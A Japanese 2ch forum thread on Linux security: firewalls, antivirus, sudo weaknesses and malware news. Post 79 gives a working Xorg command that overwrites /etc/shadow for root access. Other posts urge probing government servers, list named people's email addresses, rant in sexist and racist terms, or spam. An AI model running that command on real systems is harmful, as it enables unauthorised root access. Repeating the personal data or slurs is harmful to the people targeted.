Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net

[0001 login:Penguin 2016/06/12(日) 23:17:47.19 ID:OMH3td/9]

Linuxを安全に使うためにセキュリティについて語りましょう！

[0002 login:Penguin 2016/06/12(日) 23:38:08.55 ID:yP8FUEwn]

インターネットに繋がない

[0003 login:Penguin 2016/06/13(月) 06:09:27.32 ID:eDU8tci1]

電源を入れない

[0004 login:Penguin 2016/06/13(月) 10:29:04.09 ID:Oh9pGuME]

気にしない

[0005 login:Penguin 2016/06/13(月) 11:01:38.26 ID:2M58TAyx]

SAKOKU を使う

[0006 login:Penguin 2016/06/13(月) 11:57:17.29 ID:J1aqrsrp]

勝つためには戦わないこと(´・ω・`)

[0007 login:Penguin 2016/06/13(月) 12:21:18.30 ID:8nJEuh/y]

手始めにiptableから乗り換える話書けや

[0008 login:Penguin 2016/06/13(月) 15:37:47.75 ID:0TZsX1cx]

セキュリティ総合ってことはウィルス対策もここでいいよね？

[0009 login:Penguin 2016/06/13(月) 20:55:43.29 ID:j5ciL7QT]

そもそもLinux使うこと自体が対策に成り得る

[0010 login:Penguin 2016/06/13(月) 22:05:23.35 ID:Qr5Zi0oD]

サイバーノーガード戦法だ

[0011 login:Penguin 2016/06/13(月) 22:14:04.99 ID:K9ELyhAn]

nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。
最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。

[0012 login:Penguin 2016/06/13(月) 22:30:22.37 ID:THPCncF9]

重複
http://hayabusa6.2ch.net/test/read.cgi/linux/1150732249/

[0013 login:Penguin 2016/06/20(月) 09:45:44.94 ID:EE0G5RY5]

UACが欲しい(´・ω・｀)

[0014 login:Penguin 2016/06/27(月) 21:17:47.20 ID:1MSZfZlD]

代わりにキーリングをあげよう

[0015 login:Penguin 2016/07/08(金) 22:16:34.93 ID:nKTBpDXx]

ぱんつくれ !

[0016 login:Penguin 2016/07/11(月) 20:45:28.85 ID:1UAhQw4h]

(´･ω･`)･ω･`)　ｷｬｰ
/　　つ⊂　　 ＼　　怖いー

[0017 login:Penguin 2016/07/16(土) 12:23:29.36 ID:az2Lvjtg]

make pan

[0018 login:Penguin 2016/07/28(木) 14:39:09.27 ID:vgMn1AfM]

残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。
被害が少ないのはただ単に狙われてないからってだけ。

1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント

http://www.openwall.com/lists/owl-users/2004/10/22/2
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.

http://www.openwall.com/lists/owl-users/2004/10/20/6
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.


suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。

[0019 login:Penguin 2016/07/29(金) 08:18:56.26 ID:3v5CyHDC]

じゃけんSELinux使いましょうね

[0020 login:Penguin 2016/07/29(金) 11:43:36.67 ID:c3kWqYGY]

セキュリティ対策がはっきりしない以上Win使いしかいない
でもw10こわいわー

[0021 login:Penguin 2016/07/29(金) 12:00:07.41 ID:r5rsVV/0]

>>18
侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。

[0022 login:Penguin 2016/07/29(金) 15:11:35.83 ID:2cIkyZpH]

>>21
今の時代は｢侵入された時点でおしまい｣が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ｢普段非rootでログインして必要な時だけsu/sudoでrootになって実行する｣
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか？


もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで｢Unix/LinuxはWindowsよりセキュアなんですーー｣で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ

その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して｢異アカウント間の分離｣を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>19の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した

一方残念ながら思考停止したUnix/Linuxは、権限を得るために｢何の保護もない環境｣から実行される｢何の保護もされてないsu/sudoコマンド｣に対して｢何の保護もされてない状態でパスワードを入力する事｣状態が放置され、
その一番基本的な｢異アカウント間の分離｣すら無意味になってる体たらく
結果的に｢(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい｣になってるので、一周回ってお前の言ってることも正解なわけだがな

[0023 login:Penguin 2016/07/29(金) 15:40:50.53 ID:2cIkyZpH]

一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか

きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが

[0024 login:Penguin 2016/07/29(金) 16:57:07.30 ID:AresjTJd]

うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな？
卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ？
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの？対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。

[0025 login:Penguin 2016/07/29(金) 17:23:02.18 ID:2cIkyZpH]

>>24
俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね

そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・｀)

[0026 login:Penguin 2016/07/29(金) 17:53:59.24 ID:53ApPnD4]

windowsが仮に安全つうのは
あることするには続きは窓操作も必要だからじゃね？(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか

[0027 login:Penguin 2016/07/29(金) 19:36:23.87 ID:IWyIiLvv]

Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない

[0028 login:Penguin 2016/07/29(金) 21:02:48.88 ID:2cIkyZpH]

https://blog.martin-graesslin.com/blog/2015/11/looking-at-the-security-of-plasmawayland/
KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる

[0029 login:Penguin 2016/07/30(土) 13:47:31.26 ID:m4BHHueF]

強制アクセス制御だけでハッキングを防御できるの？できないの？
それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの？

[0030 login:Penguin 2016/07/30(土) 13:54:08.97 ID:m4BHHueF]

Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。
ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
（肝心な釘打ち無しで構築してるもんだから）
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…

[0031 login:Penguin 2016/08/13(土) 02:05:03.68 ID:oD+tGgzq]

LinuxのTCPに脆弱性、トラフィックを乗っ取られる恐れ
http://www.itmedia.co.jp/enterprise/articles/1608/12/news047.html

[0032 login:Penguin 2016/08/13(土) 04:51:41.40 ID:aN9vHd6i]

>>31
すぐ更新されるから慌てなさんな

[0033 login:Penguin 2016/08/13(土) 08:48:05.17 ID:TXBKXjH8]

>>32
2012年からあった脆弱性がすぐに修正されるの？

[0034 login:Penguin 2016/08/13(土) 08:55:27.99 ID:1K0xoI1z]

すでにパッチは出ているぞい

[0035 login:Penguin 2016/08/13(土) 11:19:12.09 ID:UrcrvCqb]

大して重要じゃないと思われてたから放置されてただけで、
修正が難しいわけじゃないのだろう。

[0036 login:Penguin 2016/08/14(日) 13:17:03.39 ID:gduCaAAf]

｢誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された｣
だろ

[0037 login:Penguin 2016/08/14(日) 14:21:25.00 ID:IM019vfG]

日本の官公庁のサーバのセキュリティってまともなの？

[0038 login:Penguin 2016/08/14(日) 18:52:10.23 ID:fe3iWrgq]

>>37
自分で確認したら？ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの？

[0039 login:Penguin 2016/09/03(土) 02:42:39.64 ID:T3i7Gd65]

アグレックスって　その１３

なんで飲み行かないの？
なんで女の子誘って飲みに行かないの？
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとＳＥＸもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
ＳＥＸしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない？
ＳＥＸしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。ＳＥＸできないよ。
恋をしなけりゃ、ＳＥＸはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせＳＥＸ出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。

お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
　　残っているのはブスばかりになってるじゃないか。
　　ブスはキツイぞ。

誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。

[0040 login:Penguin 2016/09/06(火) 16:46:15.64 ID:vVf8gi4f]

clamAVでは不安だお(´･ω･`)

[0041 login:Penguin 2016/09/06(火) 22:53:44.42 ID:TopTMWtn]

>>40
なんでよ？シスコ様だぞ？

[0042 login:Penguin 2016/09/07(水) 07:09:59.88 ID:O110MSh/]

常駐じゃないと安心できないマン

[0043 login:Penguin 2016/09/13(火) 10:37:58.85 ID:g0CBlyhH]

常駐か駐留か進駐か それが問題である

[0044 login:Penguin 2016/09/17(土) 18:12:13.92 ID:9GLGaOH4]

ｷﾞﾌﾞﾐｰﾁｮｺﾚｰﾄ

[0045 login:Penguin 2016/09/29(木) 12:32:01.60 ID:ZwQJlT8x]

尻|ωﾟ )┻┛身動きとれんのだが・・・

[0046 login:Penguin 2016/09/29(木) 12:44:59.58 ID:5wiRFmuo]

NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

[0047 login:Penguin 2016/09/29(木) 12:54:29.04 ID:lvJNOdKb]

最強のiptablesの設定をうぷしてくれる神いないの？

[0048 login:Penguin 2016/09/29(木) 20:57:19.24 ID:SWTYFo2r]

firewalldに乗り換えれ

[0049 login:Penguin 2016/10/04(火) 17:05:57.73 ID:ZgAPWl/3]

>>48
乗り換えると最強になるの？

[0050 login:Penguin 2016/10/04(火) 21:10:03.74 ID:MfnjwfuN]

設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる

[0051 login:Penguin 2016/10/23(日) 10:01:10.29 ID:PWQ2IPcX]

>>50
出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった？
なおったなら乗り換える。

[0052 login:Penguin 2016/11/30(水) 12:37:43.41 ID:SfHGIzEu]

　　 ∧,,,∧
　　 （´・ω・)　＜ おっかのうえひっなげしのはぁながぁぁ 〜
　　 （U　　　)
　　　｀ｕ-ｕ´

[0053 login:Penguin 2017/01/20(金) 17:47:06.69 ID:OITYnSWZ]

　　　　　　＿＿＿
　　　　　 (＼ ∞ ﾉ　　
　　　　　　ヽ)＿ﾉ　　迫る〜パンチ〜〜♪
　　　　　 (=O┬O
　　　　◎-ヽJ┴◎　ｷｷ〜
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣

[0054 login:Penguin 2017/02/01(水) 08:09:39.67 ID:gwo76No6]

　　　　　.γ ⌒ ヾ　
　　　　　（´・ω・`) 　迫る〜ハゲｯ♪　
　　　　　 (=O┬O
　　　　◎-ヽJ┴◎　ｷｷ〜
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣

[0055 login:Penguin 2017/02/13(月) 20:59:43.28 ID:aKHZLuDZ]

顔がでかいなぁ・・・

[0056 login:Penguin 2017/03/08(水) 21:47:52.30 ID:TuQ4x/Y7]

　　　　　　 ∧_∧
　　　　　　.ﾐ,,・_・ﾐ　　　迫る〜ハゲｯ♪　
　　　　　 (=O┬O
　　　　◎-ヽJ┴◎　ｷｷ〜
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣

[0057 login:Penguin 2017/04/19(水) 13:43:38.91 ID:kexeXY6M]

(´・ω・´・ω・ω・｀）知らんがなトリオ

[0058 login:Penguin 2017/04/28(金) 16:59:33.55 ID:ZiXyj8JT]

Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね

[0059 login:Penguin 2017/04/30(日) 00:21:15.39 ID:zhwkJ+1u]

Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど

[0060 login:Penguin 2017/04/30(日) 00:36:51.26 ID:3yi8UZQK]

使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ

[0061 login:Penguin 2017/04/30(日) 14:38:15.54 ID:6nvs6+SR]

んだんだ !

[0062 login:Penguin 2017/04/30(日) 19:21:48.33 ID:K1kIRV9a]

clamとかselinuxとか、皆さん使っていますか？

マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。

[0063 login:Penguin 2017/05/09(火) 10:29:04.72 ID:6kIUOBHa]

他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ

過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ

[0064 login:Penguin 2017/06/16(金) 09:15:27.82 ID:Cv6QgGNP]

今年も夏を乗りきれず逝く小型PCがいるのでしょうね

[0065 login:Penguin 2017/06/16(金) 09:16:10.27 ID:Cv6QgGNP]

誤爆失礼

[0066 login:Penguin 2017/07/03(月) 23:36:13.34 ID:cDHqg+NI]

openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。

ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか？
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。

linux-mint(ubuntu16.04)です。

[0067 login:Penguin 2017/07/04(火) 01:23:11.94 ID:RdyHvcf/]

>>66
くだらねえ質問はここに書き込め！Part 228
http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/

で聞いたほうが良いと思う

[0068 66 2017/07/05(水) 00:22:13.88 ID:uEgHtGC3]

>67
ありがとう。
次回からそうするわ。

ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。

https://github.com/fastlane/fastlane/issues/9542

https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant

[0069 login:Penguin 2017/09/07(木) 19:37:24.22 ID:NhVQ+S22]

すまん誰か教えてくれ！

全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い？

[0070 login:Penguin 2017/10/16(月) 19:17:31.78 ID:AvEU8VfP]

　　　　　　　　　　　。ｏ０○( zzzz… ）
　　　　　　　　_,,..,,,,_
　　　　　　　/ ,' 3／⌒ヽ-、_ 　　
　　　　　／l. 　/＿＿＿＿／
　　　　　￣￣￣￣￣￣￣ 　　

[0071 login:Penguin 2017/11/03(金) 21:09:20.77 ID:UMEHXcXh]

【 日立製作所 】焦土戦

セキュリティの基本は尖らないこと、目立たないこと。隠すこと。　バカ。

新名主　隆志 TIS shimmyozu.takashi@technopro.com
色田　眞吾 日立製作所 Shikita.Shingo@technopro.com
八木　一暢 TIS yagi.kazunobu@technopro.com
水野　潤 ﾊﾏｺﾞﾑｴｲｺﾑ Mizuno.Jun@technopro.com
佐々木　優也 （首都圏第1支店案件） sasaki.yuya@technopro.com
佐々木　健太 日立製作所 sasaki.kenta@technopro.com
中野　洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井　真祐子 富士ｿﾌﾄ nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。

[0072 login:Penguin 2017/12/29(金) 13:14:18.48 ID:S/CsVkMC]

誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒　『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

HRT6GIPYTB

[0073 login:Penguin 2018/04/11(水) 07:03:34.17 ID:9VtMkuZE]

　　　　　　　　　　　。ｏ０○( zzzz… ）
　　　　　　　　_,,..,,,,_
　　　　　　　/ ,' 3／⌒ヽ-、_ 　　
　　　　　／l. 　/＿＿＿＿／
　　　　　￣￣￣￣￣￣￣ 　

[0074 login:Penguin 2018/05/22(火) 11:10:27.97 ID:Czl6p0FW]

僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法　モニアレフヌノ』

BTBIK

[0075 login:Penguin 2018/05/26(土) 09:20:44.99 ID:c6Ml0Dod]

【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か
http://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50

[0076 login:Penguin 2018/05/26(土) 12:43:59.58 ID:H0+abEbN]

大問題じゃないか

[0077 login:Penguin 2018/05/27(日) 16:31:34.31 ID:QzfBv+yQ]

Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題ｗ

[0078 login:Penguin 2018/07/08(日) 20:50:42.96 ID:QTYf4jMn]

　　　　　　　　　　　。ｏ０○( zzzz… ）
　　　　　　　　_,,..,,,,_
　　　　　　　/ ,' 3／⌒ヽ-、_ 　　
　　　　　／l. 　/＿＿＿＿／
　　　　　￣￣￣￣￣￣￣

[0079 login:Penguin 2018/10/31(水) 11:46:41.86 ID:XLo7vX23]

suid付きXorgを使ったroot昇格法
https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)

[0080 login:Penguin 2019/03/10(日) 12:39:41.95 ID:BHkfBLF0]

　　　　　　　　　　　　i"＼ ))
　　　　　　　　　　　　| 8　 )
　　　　 　 　 　 ∧,,,∧∩-''"
　　　　　 ＿ ..(´･ω･`)彡　 おぱんつ おぱんつ ! !
　　　〃（＼ ∞ ,⊂彡
　　　　　｀ヽ)_ノ|　　　|　
　　　　　　　 　 し⌒Ｊ

[0081 login:Penguin 2019/05/24(金) 01:31:09.68 ID:WQ5DwMzT]

　　彡⌒ ミ
　 ( ´ ･ω･)　呼んだ ?

[0082 login:Penguin 2019/05/31(金) 12:30:43.06 ID:bdQbsGXY]

Linuxを狙うマルウェア「HiddenWasp」に注意　2019/05/31 06:55　後藤大地
https://news.mynavi.jp/article/20190531-833791/

Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。

このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。

・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる

Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。

[0083 login:Penguin 2019/06/01(土) 00:37:42.11 ID:/N3jDoCj]

>>82
これはひどい

俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな

SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい？)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ？

[0084 login:Penguin 2019/06/01(土) 03:51:20.70 ID:BeN0lDY7]

Linuxだから安全です。

[0085 login:Penguin 2019/06/01(土) 08:23:33.96 ID:0WGBvA8D]

ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった

[0086 login:Penguin 2019/06/01(土) 23:05:01.15 ID:aQmSSgBv]

>>83
毎日更新してるんじゃないかな

ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。

[0087 83 2019/06/02(日) 01:29:08.34 ID:Zexh2AIq]

$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました


$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒


と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね？
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが

[0088 83 2019/06/02(日) 01:30:11.25 ID:Zexh2AIq]

>>85-86へね

[0089 83 2019/06/03(月) 00:52:09.01 ID:LINEVdyy]

>>85-86
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた

どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい

ウイルス定義ファイル更新日もちゃんと書けよ＞Sophos


Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984

[0090 login:Penguin 2019/06/03(月) 02:02:29.21 ID:jJq3PPoG]

野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。

[0091 login:Penguin 2019/06/03(月) 02:06:37.36 ID:jJq3PPoG]

しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。

[0092 login:Penguin 2019/06/03(月) 08:05:48.00 ID:eMJGOUo4]

>>82
これの元記事によるとvirustotalで引っかからない
https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう

[0093 login:Penguin 2019/06/03(月) 22:51:46.35 ID:sgwkICkl]

>>82
これは具体的にどう注意したらいいんだ？

[0094 83 2019/06/03(月) 22:56:08.11 ID:LINEVdyy]

やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)

昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>

[0095 login:Penguin 2019/06/04(火) 11:45:07.22 ID:JnEdCGFR]

ソフォス個人情報入れないとダウン出来ないの？

[0096 83 2019/06/04(火) 23:57:45.16 ID:8eAlB9kG]

>>95
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫

[0097 login:Penguin 2019/06/05(水) 09:35:56.10 ID:2u//H+UO]

電話番号とか住所も？

[0098 login:Penguin 2019/06/05(水) 21:45:09.38 ID:1PL8mpQb]

電話番号、住所って書く欄あったっけ？
あったとしても、100%適当で通るよ
役職･法人名も適当でおk

国、県、郵便番号は日本、東京、1000000でおk

ちなみにLinux版はこれね
https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx
https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx

ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ

[0099 login:Penguin 2019/06/06(木) 13:34:15.13 ID:Vt0/9sNy]

>>98
都道府県がなぜか受け付けてくれない

[0100 login:Penguin 2019/06/06(木) 20:22:08.58 ID:yFuR+pcY]

>>99
先に国名で｢日本｣選んだら都道府県欄に▲▼が出て、普通にマウスクリックで｢Tokyo｣が選べるようになるでしょ

国名：　日本
都道府県：Tokyo
郵便番号：100-0000

で大丈夫だよ

[0101 login:Penguin 2019/06/07(金) 09:06:17.12 ID:boyNvVP0]

>>100
▲▼が出てこない

[0102 login:Penguin 2019/06/07(金) 20:09:33.53 ID:/Sk2vmHZ]

ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ
オフになってるんじゃない？

[0103 login:Penguin 2019/06/07(金) 21:33:16.30 ID:yVEJ6IS3]

Symantec Endpoint ProtecitonｍｐLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな
これはちと使えないわ

[0104 login:Penguin 2019/06/07(金) 23:40:08.48 ID:/Sk2vmHZ]

Symantecのって無料版あったっけ？

[0105 login:Penguin 2019/06/08(土) 02:35:25.81 ID:/huWGbTD]

Symantec Endpoint Protection for linux良さそうだが、
1年間9500円アップグレード4700円って高いな

ライセンスだけでメンテナンス不要版もあるの？


値段はここの43ページ
https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf

[0106 login:Penguin 2019/06/10(月) 15:44:13.86 ID:9N/TTeW/]

LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか？
ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・

[0107 login:Penguin 2019/06/18(火) 02:35:54.34 ID:AVJfVicP]

マイクロソフト、Azure顧客にEximワームに注意を呼びかけ
Catalin Cimpanu （ZDNet.com） 翻訳校正： 編集部 2019年06月17日 10時47分
https://japan.zdnet.com/article/35138550/

　Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。

　このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。

　ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。

　Eximはメール転送エージェント（MTA）で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。

　Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略)

